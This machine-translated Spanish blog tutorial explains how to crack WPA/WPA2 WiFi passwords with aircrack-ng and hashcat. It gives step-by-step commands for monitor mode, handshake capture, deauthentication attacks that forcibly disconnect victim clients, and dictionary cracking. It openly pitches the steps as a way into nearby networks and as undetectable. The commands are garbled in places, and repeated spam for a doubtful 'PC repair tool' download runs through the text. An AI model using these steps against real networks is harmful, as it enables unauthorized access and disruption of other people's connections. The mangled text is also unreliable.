Cómo descifrar contraseñas WiFi WPAWPA2 a través de Hashcat u0026 amp; Aircrack-ng

Actualizado 2023 de enero: Deje de recibir mensajes de error y ralentice su sistema con nuestra herramienta de optimización. Consíguelo ahora en - > este enlace

  1. Descargue e instale la herramienta de reparación aquí.
  2. Deja que escanee tu computadora.
  3. La herramienta entonces repara tu computadora.

En esta guía, te ayudaremos a descubrir cómo puedes descifrar redes WiFi utilizando dos de las mejores herramientas de piratería inalámbrica que están protegidas mediante una contraseña débil. Detallaremos paso a paso cómo puede piratear WPA2 usando aircrack-ng y hashcat, aunque no es exhaustivo. Esta será información suficiente para que los usuarios prueben la seguridad de su red o entren en una que esté cerca.

El ataque que se describe a continuación es completamente pasivo y es imposible de detectar siempre que la contraseña que ha sido descifrado no va a ser utilizado por usted. Para acelerar el proceso de reconocimiento y se puede usar un ataque de desautenticación opcional, además, puede saber más al respecto hasta el final de la guía.

Si de alguna manera tiene un poco de conocimiento sobre este proceso, entonces no es necesario que conozca las descripciones, simplemente vaya a la lista de comandos que se han utilizado en la parte inferior.

Notas importantes:

Ahora puede prevenir los problemas del PC utilizando esta herramienta, como la protección contra la pérdida de archivos y el malware. Además, es una excelente manera de optimizar su ordenador para obtener el máximo rendimiento. El programa corrige los errores más comunes que pueden ocurrir en los sistemas Windows con facilidad - no hay necesidad de horas de solución de problemas cuando se tiene la solución perfecta a su alcance:

  • Paso 1: Descargar la herramienta de reparación y optimización de PC (Windows 11, 10, 8, 7, XP, Vista - Microsoft Gold Certified).
  • Paso 2: Haga clic en "Start Scan" para encontrar los problemas del registro de Windows que podrían estar causando problemas en el PC.
  • Paso 3: Haga clic en "Reparar todo" para solucionar todos los problemas.

descargar

Nota: Tenga en cuenta una cosa: este tutorial es solo con fines educativos y no debe utilizarse para ninguna actividad ilegal y el autor no es responsable de ningún tipo de uso.

Las herramientas necesarias

  • Asegúrese de que se siente cómodo usando la línea de comandos de Linux.
  • Asegúrese de tener instalado Kali Linux o Kali NetHunter.
  • Ahora asegúrese de tener Aircrack-ng descargado e instalado.
  • La última herramienta que necesita es hashcat.
  • John The Ripper es una gran alternativa si hashcat deja de funcionar para usted.

Cómo descifrar contraseñas WPA2 con Aircrack-ng a nd Hashcat (Tutorial)

Habilita el modo de monitor en tu adaptador WiFi

Debes comenzar enumerando las interacciones inalámbricas que admiten el modo de monitor con:

Airmon-ng

Si no aparece ninguna interfaz, entonces significa que su tarjeta inalámbrica no es compatible con el modo monitor. Podemos suponer que el nombre de la interfaz inalámbrica está [protegido por correo electrónico], asegúrese de usar el nombre correcto si difiere de este, luego vamos a colocar la interfaz en el modo de monitor:

Airmon-ng start [email protected]

Después de esto, debe ejecutar iwconfig. Ahora podrá ver un nuevo modo de monitor enumerado como m [protegido por correo electrónico] o [protegido por correo electrónico] .

Encuentre su target

Debe comenzar a escuchar las tramas de baliza 802.11 que son transmitidas por los enrutadores inalámbricos cercanos utilizando la interfaz de su monitor:

Airodump-ng [correo electrónico protegido]

Verá el siguiente resultado:

CH 13] [Transcurrido: 52 s] [2021 ? 3 ? 7 16:50

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

14:91 : 82: F7: 52: EB-66 205 26 0 1 54e OPN belkin.2e8.guests

14: 91: 82: F7: 52: E8-64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8

14: 22: DB: 1A: DB: 64-81 44 7 0 1 54 WPA2 CCMP \u0026 lt; longitud: 0 \u0026 gt;

14: 22: DB: 1A: DB: 66-83 48 0 0 1 54e. WPA2 CCMP PSK lo aseguró

9C: 5C: 8E: C9: AB: C0-81 19 0 0 3 54e WPA2 CCMP PSK lo aseguró

00: 23: 69: AD: AF: 94-82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou es el mejor

06: 26: BB: 75 : ED: 69-84 232 0 0 1 54e. WPA2 CCMP PSK HH2

78: 71: 9C: 99: 67: D0-82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2

9C: 34: 26: 9F: 2E: E8-85 40 0 ​​0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT

BC: EE: 7B: 8F: 48: 28-85 119 10 0 1 54e WPA2 CCMP PSK raíz

EC: 1A: 59: 36: AD: CA-86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca

Ahora vamos a descifrar la contraseña de una red con el nombre de secureyou. Debe recordar la dirección MAC BSSID, así como el número de canal (CH) tal como lo muestra Airodump-ng, ya que los requerimos para el siguiente paso.

LEER:   Cómo proteger su cuenta de Twitter de los piratas informáticos (consejos de 2021)

Cómo capturar un Apretón de manos de 4 vías en redes WiFi

El WPA o WPA2 utiliza un apretón de manos de 4 vías para autenticar dispositivos en la red. No necesita saber qué significa, pero necesita capturar uno de estos apretones de manos para descifrar la contraseña de la red. Los apretones de manos se llevan a cabo cuando un dispositivo se conecta con la red, como cuando sus vecinos vuelven a casa, podemos capturar este apretón de manos dirigiendo airmon-ng para monitorear el tráfico en el objetivo utilizando el canal, así como los valores bssid que provienen del último comando.

  • reemplace los valores-cy ? bssid con los valores de su red objetivo
  • -w especifica el directorio donde guardaremos la captura del paquete
  • airodump-ng-c 3 ? bssid 9C: 5C: 8E: C9: AB: C0-w. mon0
  • CH 6] [Transcurrido: 1 min] [2020 ? 3 ? 13:09:16]
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-47 0140 0 0 6 54e WPA2 CCMP PSK DELL

Una vez que haya capturado el apretón de manos, debe ver algo como {Apretón de manos WPA: bc: d3: c9: ef: d2: 67 allí está la parte superior derecha de la pantalla, justo a la derecha de la hora actual.

Si se siente impaciente y se siente cómodo con el uso del ataque activo, puede obligar a los dispositivos a conectarse a la red de destino para volver a conectarse enviándoles paquetes de desautenticación maliciosos. Esto da como resultado la captura de un apretón de manos de 4 vías.

Una vez que se ha capturado el apretón de manos, debe presionar ctrl-c para salir de airodump-ng. Verá un archivo .cap donde le dijo a airodump-ng que guardara la captura que se llama-01.Cap. Vamos a utilizar este archivo de captura para descifrar la contraseña de la red. Vamos a cambiar el nombre de este archivo para reflejar el nombre de la red que estamos intentando descifrar:

Mv ./-01.cap secureyou .cap

La verdadera diversión: descifrar el pin WPA2

El último paso es descifrar la contraseña usando el apretón de manos capturado. Si tiene acceso a una GPU, se recomienda encarecidamente utilizar el hashcat para descifrar contraseñas. Hemos creado una herramienta que hace que el hashcat sea muy fácil de usar conocida como naïve-hashcat.

Si no tiene acceso a la GPU, puede encontrar muchos servicios de craqueo de GPU que se pueden utilizar como el GPUHASH.me o OnlineHashCrack. También puede utilizar el craqueo de CPU con Aircrack-ng. Sin embargo, si desea ahorrar tiempo y usar la mayor parte de su GPU, entonces debe overclockear su GPU para acelerar la fuerza bruta.

LEER:   Cómo overclockear su tarjeta gráfica para un FPS 2021 más alto (NvidiaAMD)

Tenga en cuenta que las dos formas siguientes asumen una contraseña generada por el usuario. . Muchos de los enrutadores WPA o WPA2 vienen con una cadena de contraseñas aleatorias de 12 caracteres que la mayoría de los usuarios no modifican. Le recomendamos que utilice los archivos de diccionario de longitud WPA de listas de palabras probables si desea descifrar alguna de estas contraseñas.

Uso de Naive-Hashcat para hacer la magia

Antes de descifrar la contraseña utilizando naïve-hashcat, debe convertir el archivo .cap al formato de archivo hashcat equivalente .hccapx. Esto se puede hacer muy rápidamente cargando el archivo .cap en https://hashcat.net/cap2hccapx o usando directamente la herramienta cap2hccapx.

Luego, debe descargarlo y ejecutarlo en hashcat:

# downloadgit clone https://github.com/brannondorsey/naive-hashcat

cd naive-hashcat

Descargue una lista de palabras o un archivo de diccionario grande:

Lista de palabras de contraseñas para descifrar contraseñas WPA2 WiFi

Modo Hashcat para WPA/WPA2 que debe configurar:

2500 es el modo hash de hashcat para WPA/WPA2

HASH_FILE = secureyou.hccapx POT_FILE = secureyou.pot HASH_TYPE = 2500 ./naive-hashcat .sh

El naïve-hashcat utiliza diferentes ataques como regla, combinación, máscara y diccionario y puede tardar casi 10 días en ejecutarse contra las contraseñas de nivel medio. La contraseña descifrada se guarda en hackme.pot, por lo que debe verificar este archivo periódicamente. Una vez que se haya descifrado la contraseña, verá algo como esto como el contenido de su POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3: 9c5c8ec9abc0: acd1b8dfd971: ASUS: secureyouhacking

Los dos últimos archivos que han sido separados por: es el nombre de la red y la contraseña respectivamente.

Uso de Aircrack-ng para realizar un ataque de diccionario

El aircrack-ng también se puede utilizar para ataques de diccionario que son básicos y se ejecutan en su CPU. Antes de ejecutar el delito, necesita una lista de palabras. Le recomendamos que utilice el infame archivo de diccionario rockyou.

Descargar archivo de lista de palabras del diccionario RockYou

Tenga en cuenta que si la contraseña de red no es en la lista de palabras, entonces no debe descifrar la contraseña.

  • #-a2 especifica WPA2,-b es el BSSID,-w es el archivo de palabras
  • aircrack-ng-a2-b 9C: 5C: 8E: C9: AB: C0-w rockyou.txt hackme.cap

Deberá ver un mensaje de LLAVE ENCONTRADA en el terminal seguido de una versión de texto sin formato de la contraseña de red si la contraseña está descifrada.

  • Aircrack-ng 2.0
  • [00:01:49] 111040 claves probadas (102,73 k/s)
  • ¡LLAVE ENCONTRADA! [SecuredYou-test-environment]
  • Clave maestra: A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
  • 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
  • Clave transitoria: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
  • 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
  • 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
  • 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
  • EAPOL HMAC: 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Realización de la-Ataque de autenticación

El ataque de eliminación de autenticación puede enviar paquetes de autenticación falsificados desde su máquina hacia el cliente conectado a la red que está intentando descifrar. Los paquetes incluyen direcciones de remitente falsas que le parecen al cliente como si fueran enviadas desde el punto de acceso. Al recibir paquetes como estos, es probable que muchos clientes se desconecten de la red y luego se vuelvan a conectar inmediatamente con un protocolo de enlace de 4 vías si está escuchando con airodump-ng.

LEER:   Las 5 mejores formas probadas de proteger su teléfono Android en 2021

Puede usar airodump-ng para monitorear un punto de acceso específico (usando –c canal –bssid MAC) a menos que y hasta que vea un cliente (ESTACIÓN) conectado. Un cliente conectado se ve casi así, donde es 64: BC: 0C: 48: 97: F7 el MAC del cliente.

  • CH 7] [Transcurrido: 4 minutos] [2020 ? 3-08 20:24]
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-19 75 1043144 10 6 54e WPA2 CCMP PSK ASUS
  • BSSID STATION PWR Tasa de problemas de tramas perdidas
  • 9C: 5C: 8E: C9: AB : C0 64: BC: 0C: 48: 97: F7-37 1e-1e 4 6479 Dell

Ahora debe dejar airodump-ng para que se ejecute y abra una nueva terminal. Vamos a usar un comando airplay-ng para enviar paquetes de autenticación falsos hacia el cliente víctima, lo que lo obliga a reconectarse con la red y, con suerte, tomar un apretón de manos en el proceso.

  • -0 3 especifica que nos gustaría enviar 3 paquetes de autenticación. Aumente este número
  • si es necesario con el riesgo de interrumpir notablemente la actividad de la red del cliente
  • -a es la MAC del punto de acceso
  • -c es la MAC del cliente
  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: X0-c 64: DC: 3C: 48: 97: F7 mon0

También puede transmitir paquetes deauth a todos los clientes conectados en una red inalámbrica usando el siguiente comando:

  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: C0 mon0

Tan pronto como envíe los paquetes deauth , debe volver al proceso airodump-ng y, si hay suerte, podrá ver algo como esto en la parte superior derecha [Apretón de manos WPA: 9C: 6C: 9E: D7: 8G: C0. Ahora, una vez capturado el apretón de manos, está listo para descifrar la contraseña de la red.

Versión en video del tutorial

Si es alguien que aprende viendo a otra persona hacerlo, a continuación se muestra una versión en video para usted.

Hackear contraseñas inalámbricas WPA2 usando Aircrack-ng/Hashcat

Herramientas de piratería inalámbricas alternativas que podría utilizar:

  • Descarga gratuita de Kismet-WiFi Sniffer
  • Descarga de Reaver WPS Pin Cracker
  • 15 Las mejores herramientas de piratería y herramientas de seguridad gratuitas para descargar.

Últimas palabras

Descargo de responsabilidad: esto es solo un simulación de cómo alguien puede descifrar contraseñas WPA2 utilizando herramientas como Hashcat y Aircrack-ng. Este tipo de actividad solo debe realizarse en un entorno controlado donde se dé permiso. Sin embargo, espero que haya disfrutado de este tutorial completo y lo haya aprovechado al máximo.

adminguides

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *